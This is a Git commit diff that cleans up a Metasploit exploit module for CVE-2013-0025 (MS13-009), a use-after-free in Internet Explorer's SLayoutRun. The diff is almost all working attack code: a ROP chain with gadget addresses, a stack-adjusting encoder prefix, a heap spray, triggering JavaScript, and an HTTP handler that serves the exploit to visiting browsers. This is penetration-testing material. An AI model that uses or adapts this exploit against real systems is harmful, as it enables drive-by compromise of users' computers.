cleanup for the module

bug/bundler_fix
jvazquez-r7 2013-02-21 20:04:05 +01:00
parent ade2c9ef56
commit b4f4cdabbc
1 changed files with 21 additions and 54 deletions

View File

@ -8,12 +8,11 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer SLayoutRun Use-After-Free",
@ -25,20 +24,20 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Scott Bell <scott.bell@security-assessment.com>', # Vulnerability discovery & Metasploit module
'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0025' ],
[ 'MSB', 'MS13-009' ],
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'Space' => 920,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions' =>
{
@ -137,45 +136,35 @@ class Metasploit3 < Msf::Exploit::Remote
rop_payload << [0x77c39f92].pack("V") # RETN
rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset
rop_payload << code
end
return rop_payload
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def get_exploit(my_target, cli)
p = get_payload(my_target, cli)
js = heap_spray(my_target, p)
html = %Q|
<!doctype html>
<html>
<head>
<script>
var data
var objArray = new Array(1800);
#{js}
</script>
<script>
var data;
var objArray = new Array(1150);
setTimeout(function(){
for (var i=0;i<objArray.length;i++){
objArray[i] = document.createElement('body');
document.body.appendChild(objArray[i])
objArray[i].style.display = "none"
}
document.body.style.whiteSpace = "pre-line";
document.body.style.whiteSpace = "pre-line"
CollectGarbage();
for(var i=0;i<10;i++){
for (var i=0;i<(objArray.length-650);i++){
for (var i=0;i<1150;i++){
objArray[i] = document.createElement('div');
objArray[i].className = data += unescape("%u0c0c%u0c0c");
}
}
setTimeout(function(){document.body.innerHTML = "boo"}, 100)
}, 100)
@ -192,19 +181,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_iframe
html = %Q|
<html>
<body>
<iframe src="#{this_resource}/#{@iframe_name}" height="1" width="1"></iframe>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
@ -218,21 +194,12 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
if uri =~ /#{@iframe_name}/
html = get_exploit(my_target, cli)
html = html.gsub(/^\t\t/, '')
print_status("Sending HTML...")
else
html = get_iframe
print_status "Sending IFRAME..."
end
print_status "Sending HTML..."
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@iframe_name = "#{Rex::Text.rand_text_alpha(5)}.html"
super
end
end